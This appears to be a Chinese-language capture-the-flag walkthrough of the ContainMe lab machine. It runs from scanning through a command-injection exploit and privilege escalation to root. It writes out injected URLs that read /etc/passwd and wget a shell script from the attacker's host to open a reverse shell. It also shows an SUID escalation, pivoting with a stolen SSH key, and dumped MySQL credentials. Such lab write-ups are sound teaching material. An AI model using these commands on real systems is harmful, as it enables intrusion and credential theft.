Vulnhub系列靶机-THM-ContainMe-v4

文章目录

  • Vulnhub系列靶机-THM-ContainMe-v4
    • 1. 信息收集
      • 1.1 主机扫描
      • 1.2 端口扫描
      • 1.3 目录爆破
    • 2. 漏洞探测
    • 3. 漏洞利用
    • 4. 权限提升

Vulnhub系列靶机-THM-ContainMe-v4

1. 信息收集

1.1 主机扫描

arp-scan -l

Vulnhub系列靶机-THM-ContainMe-v4_第1张图片

1.2 端口扫描

nmap -A -p- 192.168.188.188

Vulnhub系列靶机-THM-ContainMe-v4_第2张图片

端口扫描出来了:22,80,2222,8022。

访问Web页面

Vulnhub系列靶机-THM-ContainMe-v4_第3张图片

查看发现没有什么有用的信息。

1.3 目录爆破

dirsearch -u http://192.168.188.188 -e * -i 200

Vulnhub系列靶机-THM-ContainMe-v4_第4张图片

扫描出来四个目录,挨个查看一下。

查看info.php页面。

Vulnhub系列靶机-THM-ContainMe-v4_第5张图片

index.php页面。

Vulnhub系列靶机-THM-ContainMe-v4_第6张图片

查看index.php的页面源代码。

Vulnhub系列靶机-THM-ContainMe-v4_第7张图片

2. 漏洞探测

使用工具wfuzz测试

wfuzz -u "http://192.168.188.188/index.php?FUZZ=aaa" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 329

wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。

使用wfuzz进行Web应用扫描的基本步骤如下:

  1. 确定目标URL或IP地址。
  2. 构建字典文件或下载现成的字典文件。
  3. 运行wfuzz并指定扫描参数,如目标URL、字典文件等。
  4. 分析扫描结果,识别存在的漏洞和安全问题。
  5. 根据扫描结果进行修复和加固。

命令解析

  • wfuzz:命令行中执行wfuzz工具。
  • -u "http://192.168.188.188/index.php?FUZZ=aaa":指定了目标URL。FUZZ是一个占位符,wfuzz将使用字典中的每个词替换它,aaa是初始的替换值。这个命令将测试以http://192.168.188.188/index.php?FUZZ=形式的URL。
  • -w /usr/share/seclists/Discovery/Web-Content/common.txt:设置字典文件的路径。这里使用了/usr/share/seclists/Discovery/Web-Content/common.txt作为字典文件。该字典文件包含了一些常见的Web路径和文件名。
  • --hh 329:提示wfuzz在响应正文中寻找特定的字符串。329是用于匹配的字符串,如果找到它,wfuzz会将该响应认为是有效的。

详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。具体来说,它会将字典中的每个词替换掉占位符FUZZ,然后发送请求。如果响应中包含字符串329,那么wfuzz会将其认为是一个有效的响应。

Vulnhub系列靶机-THM-ContainMe-v4_第8张图片

检测到了path参数,将其拼接在路径后面并添加参数进行测试。

Vulnhub系列靶机-THM-ContainMe-v4_第9张图片

发现我们拼接的参数执行了,试着查看etc下的passwd文件。

http://192.168.188.188/index.php?path=/;cat%20/etc/passwd

Vulnhub系列靶机-THM-ContainMe-v4_第10张图片

命令执行漏洞。

3. 漏洞利用

既然命令可以执行,那么我们尝试写入shell脚本。

image-20230914205215642

kali中开启http服务

python3 -m http.server 1234

image-20230914203200296

然后浏览器访问路径。

注意:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。

http://192.168.188.188/index.php?path=aaa;wget%20-P%20/tmp%20http://192.168.188.157:1234/shell.sh

查看我们的shell文件是否写入

http://192.168.188.188/index.php?path=aaa;ls%20-al%20/tmp

Vulnhub系列靶机-THM-ContainMe-v4_第11张图片

文件写入成功。

执行该脚本文件,首先在kali中监听9999端口

image-20230914205312958

然后执行脚本文件

http://192.168.188.188/index.php?path=aaa;bash%20/tmp/shell.sh

Vulnhub系列靶机-THM-ContainMe-v4_第12张图片

反弹成功

Vulnhub系列靶机-THM-ContainMe-v4_第13张图片

之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。

Vulnhub系列靶机-THM-ContainMe-v4_第14张图片

发现一个1cryptup文件,尝试执行。

./1cryptupx

Vulnhub系列靶机-THM-ContainMe-v4_第15张图片

但是现在所看到的用户权限太低了,进行提权。

4. 权限提升

使用find命令进行提权

find / -perm -4000 2>/dev/null

发现了/usr/share/man/zh_TW/crypt

Vulnhub系列靶机-THM-ContainMe-v4_第16张图片

进入到指定的目录,然后执行相应的文件。

Vulnhub系列靶机-THM-ContainMe-v4_第17张图片

执行后发现已经是root权限了,但是Id依然显示的是www-data用户。但是这是一个残废的shell。

使用python3来获取完整的终端环境

python3 -c 'import pty;pty.spawn("/bin/bash")'

命令解析:

  • python3 -c:这是在命令行中运行 Python 3 解释器,并通过 -c 选项提供即时执行 Python 代码的能力。
  • 'import pty;pty.spawn("/bin/bash")':这是传递给 Python 解释器的代码字符串。它导入了 pty 模块并调用 spawn() 函数来创建一个伪终端并执行 /bin/bash 命令。
    • import pty:这是导入 pty 模块,pty 是一个用于处理伪终端(pseudo-terminal)的模块,它提供了一种在程序中控制终端会话的方法。
    • pty.spawn("/bin/bash"):这是调用 spawn() 函数来创建一个伪终端并执行 /bin/bash 命令。
    • spawn():该函数接受一个要执行的命令作为参数,并将当前程序的标准输入、输出以及错误连接到创建的伪终端。这样做可以实现交互式的终端会话,允许用户与 /bin/bash 命令进行交互,就像在终端中直接执行一样。

Vulnhub系列靶机-THM-ContainMe-v4_第18张图片

查看网络接口

ifconfig

Vulnhub系列靶机-THM-ContainMe-v4_第19张图片

发现我们在docker容器内。

扫描接口是否还有其他主机

for i in {1..254} ;do (ping 172.16.20.$i -c 1 -w 5 >/dev/null && echo "172.16.20.$i" &) ;done

命令解析:

  • Bash 命令,用于对 IP 地址范围进行 Ping 测试,并将能够成功 Ping 通的 IP 地址打印出来。

image-20230914215815898

发现了172.16.20.2和172.16.20.6两个IP地址。

扫描还有哪些端口

for port in {1..65535}; do
   echo >/dev/tcp/172.16.20.6/$port &&
     echo "port $port is open"
 done 2>/dev/null |grep open

命令解析:

  • 该命令用于扫描指定 IP 地址上的所有端口,并输出开放的端口号。
  • /dev/tcp/172.16.20.6/$port 是特殊的路径,它允许 Bash 通过创建一个与指定 IP 地址和端口相关联的文件描述符来模拟与该主机的 TCP 连接。

Vulnhub系列靶机-THM-ContainMe-v4_第20张图片

发现仅开启了一个22端口。

但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。

Vulnhub系列靶机-THM-ContainMe-v4_第21张图片

id_rsa是私钥文件的名称。

ssh除了密码登录,尝试利用mike用户的密钥登录

ssh [email protected] -i id_rsa        #-i 指定连接文件

这个命令用于通过SSH协议连接到远程主机。解析:

  • ssh:在命令行中执行SSH客户端工具。
  • [email protected]:指定要连接的远程主机的用户名和IP地址。mike是用户名,172.16.20.6是目标主机的IP地址。
  • -i id_rsa:使用指定的私钥文件进行身份验证。id_rsa是私钥文件的名称。

连接成功

Vulnhub系列靶机-THM-ContainMe-v4_第22张图片

检查一下有哪些服务是开启着的

ss -ntlp

说明:ss -ntlp 是一个 Linux 命令,用于列出当前系统上所有处于监听状态的 TCP 端口和相应的进程信息。

Vulnhub系列靶机-THM-ContainMe-v4_第23张图片

mysql的3306端口是开放的。

使用弱密码password登录。

Vulnhub系列靶机-THM-ContainMe-v4_第24张图片

连接成功。

Vulnhub系列靶机-THM-ContainMe-v4_第25张图片

获取用户名和密码

Vulnhub系列靶机-THM-ContainMe-v4_第26张图片

root bjsig4868fgjjeog
mike WhatAreYouDoingHere

退出mysql,切换为root用户

Vulnhub系列靶机-THM-ContainMe-v4_第27张图片

进入到root目录下发现有个压缩文件

Vulnhub系列靶机-THM-ContainMe-v4_第28张图片

利用unzip解压,解压完成后发现flag在里头

Vulnhub系列靶机-THM-ContainMe-v4_第29张图片

image-20230914221744350

通关成功!

你可能感兴趣的:(网络安全,系统安全,网络,安全,靶机,vulnhub)